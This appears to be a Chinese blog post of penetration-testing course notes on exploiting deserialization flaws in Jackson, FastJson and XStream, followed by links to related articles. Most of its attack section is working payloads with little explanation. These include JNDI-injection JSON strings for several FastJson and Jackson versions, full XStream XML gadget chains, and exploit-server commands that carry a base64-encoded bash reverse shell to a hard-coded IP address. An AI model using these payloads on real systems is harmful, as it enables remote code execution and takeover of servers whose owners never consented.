DAY83服务攻防-开发组件安全&Jackson&FastJson 各版本&XStream&CVE 环境复现

于 2024-10-01 18:41:59 发布
阅读量582 收藏 4
点赞数 20
文章标签: 安全 中间件 安全服务 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/142673367
版权

知识点

1、J2EE-组件Jackson-本地demo&CVE(数据处理)

2、J2EE-组件FastJson-本地demo&CVE(数据处理)

3、J2EE-组件XStream-本地demo&CVE(数据处理)

章节点:

1、目标判断-端口扫描&组合判断&信息来源

2、安全问题-配置不当&CVE漏洞&弱口令爆破

3、复现对象-数据库&中间件&开发框架&应用协议

黑盒检测:

Java应用 请求参数数据以json/xml格式发送测试

黑盒判断:

通过提交数据报错信息得到什么组件

xml格式(xstream) 或 json 格式(fastjson jackson)

白盒审计:

直接看引用组件版本

一、演示案例-J2EE-组件Jackson-本地demo&CVE

当下流行的json解释器,主要负责处理Json的序列化和反序列化。

代码执行 (CVE-2020-8840)

String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/Exploit\"}]";

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A 1.92.144.175

代码执行 (CVE-2020-35728)

影响版本

FasterXML jackson-databind 2.x < 2.9.10.8

String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"rmi://47.94.236.117:1099/gtaafz\"}]";

二、演示案例-J2EE-组件FastJson-本地demo&CVE

阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。

重点就是:不同版本的fastjson,不同的poc

利用POC项目:
GitHub - kezibei/fastjson_payload(该项目是针对不同环境的)

FastJson <= 1.2.24

{

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://evil.com:9999/TouchFile",

        "autoCommit":true

    }

}

FastJson <= 1.2.47

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://evil.com:9999/Exploit",

        "autoCommit":true

    }

}

FastJson <= 1.2.80 (利用条件比较苛刻)

利用poc只能用源码项目中调用的第三方库或者组件(类)等

在实战中,获取目标项目源码后看下调用的第三方库或者组件有哪些,然后在利用poc项目去找对应的POC去测试看看(机会不大)

利用POC:
GitHub - kezibei/fastjson_payload(该项目是针对不同环境的)

三、演示案例-J2EE-组件XStream-靶场&CVE

开源Java类库,能将对象序列化成XML或XML反序列化为对象

  • 1

代码执行 (CVE-2021-21351)

影响版本:

Xstream<=1.4.15

1、生成反弹Shell的JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjE0NC4xNzUvOTkwMCAwPiYx}|{base64,-d}|{bash,-i}" -A 1.92.144.175

2、构造JNDI注入Payload以POST方式提交

<sorted-set>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>

      <m__DTMXRTreeFrag>

        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>

          <m__size>-10086</m__size>

          <m__mgrDefault>

            <__overrideDefaultParser>false</__overrideDefaultParser>

            <m__incremental>false</m__incremental>

            <m__source__location>false</m__source__location>

            <m__dtms>

              <null/>

            </m__dtms>

            <m__defaultHandler/>

          </m__mgrDefault>

          <m__shouldStripWS>false</m__shouldStripWS>

          <m__indexing>false</m__indexing>

          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>

            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>

              <javax.sql.rowset.BaseRowSet>

                <default>

                  <concurrency>1008</concurrency>

                  <escapeProcessing>true</escapeProcessing>

                  <fetchDir>1000</fetchDir>

                  <fetchSize>0</fetchSize>

                  <isolation>2</isolation>

                  <maxFieldSize>0</maxFieldSize>

                  <maxRows>0</maxRows>

                  <queryTimeout>0</queryTimeout>

                  <readOnly>true</readOnly>

                  <rowSetType>1004</rowSetType>

                  <showDeleted>false</showDeleted>

                  <dataSource>rmi://evil-ip:1099/example</dataSource>

                  <listeners/>

                  <params/>

                </default>

              </javax.sql.rowset.BaseRowSet>

              <com.sun.rowset.JdbcRowSetImpl>

                <default/>

              </com.sun.rowset.JdbcRowSetImpl>

            </fPullParserConfig>

            <fConfigSetInput>

              <class>com.sun.rowset.JdbcRowSetImpl</class>

              <name>setAutoCommit</name>

              <parameter-types>

                <class>boolean</class>

              </parameter-types>

            </fConfigSetInput>

            <fConfigParse reference='../fConfigSetInput'/>

            <fParseInProgress>false</fParseInProgress>

          </m__incrementalSAXSource>

          <m__walker>

            <nextIsRaw>false</nextIsRaw>

          </m__walker>



          <m__endDocumentOccured>false</m__endDocumentOccured>

          <m__idAttributes/>

          <m__textPendingStart>-1</m__textPendingStart>

          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>

          <m__pastFirstElement>false</m__pastFirstElement>

        </m__dtm>

        <m__dtmIdentity>1</m__dtmIdentity>

      </m__DTMXRTreeFrag>

      <m__dtmRoot>1</m__dtmRoot>

      <m__allowRelease>false</m__allowRelease>

    </value>

  </javax.naming.ldap.Rdn_-RdnEntry>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XString'>

      <m__obj class='string'>test</m__obj>

    </value>

  </javax.naming.ldap.Rdn_-RdnEntry>

</sorted-set>

代码执行 (CVE-2021-29505)

影响版本

XStream <= 1.4.16

1、生成反弹Shell的反序列化JNDI注入

java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjE0NC4xNzUvOTkwMCAwPiYx}|{base64,-d}|{bash,-i}"

2、构造反序列化JNDI注入Payload以POST方式提交
<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>evil-ip</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>evil-ip</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

小春学渗透
关注
服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 751
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
服务攻防-中间件安全&CVE 复现&Weblogic&Jenkins&GlassFish
m0_61506558的博客
12-19 583
(一)中间件-Weblogic安全(一)中间件-Weblogic安全探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器,检测工具,如下github链接2.cve_2018_2893 工具3.cve_2018_3245 工具4.cve_2020_14882 工具。
Day83服务攻防-开发组件安全&Jackson&FastJson版本&XStream&CVE环境复现
qq_61553520的博客
04-05 1737
小迪安全-Day83服务攻防-开发组件安全&Jackson&FastJson版本&XStream&CVE环境复现
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1238
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
面试总结-2023届安全面试题总汇
lza20001103的博客
09-16 6916
2023届安全面试题总汇 文章目录2023届安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5576
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
2023级网络安全岗面试题及面试经验分享
黑战士的博客
02-25 6850
在当今社会网络安全行业越来越发达,也有越来越多的人去学习,为了更好地进行工作,除了学好知识外还要应对企业的面试。 所以在这里我归总了一些网络安全方面的常见面试题,希望对大家有所帮助。 一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享~ 写在前面 个人强烈感觉面试因人而异,对于简历上有具体项目经历的同学,个人感觉面试官会着重让你介绍自己的项目,包括但不限于介绍一次真实攻防/渗透/挖洞/CTF/代码审计的经历 => 因此对于自己的项目,面试前建议做一次复盘,最好能用文字描述出细节
2023级安全岗面试题及面试经验分享
yggcwhat
04-30 3189
写在前面 个人强烈感觉面试因人而异,对于简历上有具体项目经历的同学,个人感觉面试官会着重让你介绍自己的项目,包括但不限于介绍一次真实攻防/渗透/挖洞/CTF/代码审计的经历 => 因此对于自己的项目,面试前建议做一次复盘,最好能用文字描述出细节,在面试时才不会磕磕绊绊、或者忘了一些自己很得意的细节 面试题会一直更新(大概,直到我毕业或者躺平为止吧...)包括一些身边同学(若他们同意的话)和牛客上扒拉下来的(若有,会贴出链接)还有自己的一些经历 还有一点很想说的,就是面试题/面
HW面试常见知识点2——研判分析(蓝队中级版)
练习时长两年半的CTF爱好者
06-03 3799
护网一般分为红蓝两队,做红蓝对抗。红队为攻击队,红队的构成主要有“国家队”(国家的网安等专门从事网络安全的技术人员)、厂商的渗透技术人员。其中“国家队”的占比大概是60%左右,厂商的技术人员组成的攻击小队占比在40%左右。一般来说一个小队大概是3个人,分别负责信息收集、渗透、打扫战场的工作。蓝队为防守队,一般是随机抽取一些单位参与。另外设有裁判组 负责整个演习过程中的评判、评分工作。网络安全人才,是建设网络强国的最重要资源。网络安全的本质在对抗,对抗的本质在攻防两端能力的较量。
fastjson-1.2.83 针对近期阿里fastjson包漏洞,升级解决
05-24
Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞,经研究该防御策略在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 Fastjson 用户尽快采取安全措施保障系统安全
fastjson版本jar包以及使用方法
07-19
Fastjson曾因某些版本存在安全漏洞而被关注,因此在使用过程中应保持版本更新,及时修复可能的安全风险。此外,避免在不安全环境中使用`parseObject()`方法,防止恶意输入导致代码执行。 总之,Fastjson作为一款...
四种JSON解析工具--(json-lib&Jackson&Gson&FastJson
Double____C的博客
05-17 6659
两个JSON格式
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 743
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 661
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 549
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 492
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1208
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 1337
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
任务 : 使用Docker搭建Java漏洞的实验环境 https://vulhub.org Fastjson : 1.2.24 和 1.2.47 log4j2 : CVE-2021-44228 kali2020-2024
09-19
要在Kali Linux 2020-2024上使用Docker搭建Fastjson(版本1.2.24和1.2.47)和log4j2 (CVE-2021-44228)的Java漏洞实验环境,你需要按照以下步骤操作: 1. **安装Docker**: 首先确保你的系统上已经安装了Docker。如果没有,你可以从https://docs.docker.com/engine/installation/ 下载并安装适合你的Linux发行版的版本。 2. **获取镜像**: - 对于Fastjson 1.2.24和1.2.47,你需要找到包含这两个版本的Java Docker镜像。可以在Docker Hub上搜索"java-fastjson",然后选择一个包含了所需版本的镜像。 - 对于log4j2的CVE-2021-44228漏洞,需要找一个包含修复或易受攻击版本的log4j2的镜像。由于这是安全相关的漏洞,可能需要特定的安全更新镜像。 3. **创建Dockerfile**: 创建一个名为`Dockerfile`的文件,内容大致如下(假设Fastjson镜像是`fastjson:1.2.24`和`fastjson:1.2.47`,log4j2镜像是`log4j2:cve_2021_44228_fixed`): ```dockerfile FROM openjdk:8-jdk-alpine RUN apk update && apk add wget # 安装Fastjson 1.2.24 RUN wget https://mvnrepository.com/artifact/com.alibaba/fastjson/1.2.24/download fastjson-1.2.24.jar && mv fastjson-1.2.24.jar /usr/local/lib/ # 安装Fastjson 1.2.47 RUN wget https://mvnrepository.com/artifact/com.alibaba/fastjson/1.2.47/download fastjson-1.2.47.jar && mv fastjson-1.2.47.jar /usr/local/lib/ # 如果有log4j2镜像,替换此处为相应的URL RUN wget https://github.com/apache/logging-log4j2/releases/download/log4j-2.15.0/log4j-2.15.0.jar && mv log4j-2.15.0.jar /usr/local/lib/ # 设置应用入口点 WORKDIR /app EXPOSE 8080 CMD ["java", "-jar", "your-app.jar"] ``` 4. **构建镜像**: 运行 `docker build -t java-vulnerable-environment .` 来构建你的自定义镜像。 5. **运行容器**: 可以通过 `docker run -p 8080:8080 -it java-vulnerable-environment` 启动容器,并映射主机的8080端口到容器内的8080端口,以便访问。 6. **验证漏洞**: 登录到容器内,尝试利用已知的Fastjson和log4j2漏洞。检查是否存在预期的行为或错误日志,这通常涉及到编写恶意输入并查看程序反应。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值